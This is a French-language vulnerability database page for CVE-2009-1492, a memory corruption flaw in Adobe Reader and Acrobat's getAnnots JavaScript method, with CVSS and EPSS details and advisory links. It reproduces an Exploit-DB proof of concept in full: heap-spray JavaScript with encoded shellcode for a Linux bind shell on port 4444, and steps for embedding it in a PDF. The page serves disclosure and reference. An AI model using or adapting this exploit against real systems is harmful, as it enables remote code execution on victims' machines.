CVE-2009-1492 : Détail

CVE-2009-1492

91.63%V3
Network
2009-04-30
18h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 8569

Date de publication : 2009-04-28 22h00 +00:00
Auteur : Arr1val
EDB Vérifié : Yes

//############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux // //Steps: //- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted) //- attach the following script to the OpenAction of the pdf. //############## var memory; function New_Script() { //if(adobe9)//adobe reader 8 works also with app.setTimeOut? var startwith = app.alert('Hi');//required for adobe9 var nop = unescape("%u9090%u9090"); //long nop will also force the address to go to 0x90909090 so 2 steps in one ;) var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444 while(nop.length <= 0x100000/2) nop+=nop; nop=nop.substring(0,0x100000/2 - shellcode.length); memory=new Array(); for(i=0;i<0x6ff;i++) //we should at least overwrite 0x90909090 {memory[i]=nop + shellcode;} //start exploit now start(); function start() { this.getAnnots(-134217728,-134217728,-134217728,-134217728); } } //############################ # milw0rm.com [2009-04-29]

Products Mentioned

Configuraton 0

Adobe>>Acrobat >> Version From (including) 7.0 To (including) 7.1.1

Adobe>>Acrobat >> Version From (including) 8.0 To (including) 8.1.4

Adobe>>Acrobat >> Version From (including) 9.0 To (including) 9.1

Configuraton 0

Adobe>>Acrobat_reader >> Version From (including) 7.0 To (including) 7.1.1

Adobe>>Acrobat_reader >> Version From (including) 8.0 To (including) 8.1.4

Adobe>>Acrobat_reader >> Version From (including) 9.0 To (including) 9.1

Références

https://www.exploit-db.com/exploits/8569
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/35734
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA09-133B.html
Tags : third-party-advisory, x_refsource_CERT
http://www.vupen.com/english/advisories/2009/1189
Tags : vdb-entry, x_refsource_VUPEN
http://security.gentoo.org/glsa/glsa-200907-06.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://sunsolve.sun.com/search/document.do?assetkey=1-66-259028-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://secunia.com/advisories/34924
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/1317
Tags : vdb-entry, x_refsource_VUPEN
http://www.securitytracker.com/id?1022139
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/35358
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/35055
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.kb.cert.org/vuls/id/970180
Tags : third-party-advisory, x_refsource_CERT-VN
http://osvdb.org/54130
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/35416
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2009-0478.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/35096
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/35152
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/34736
Tags : vdb-entry, x_refsource_BID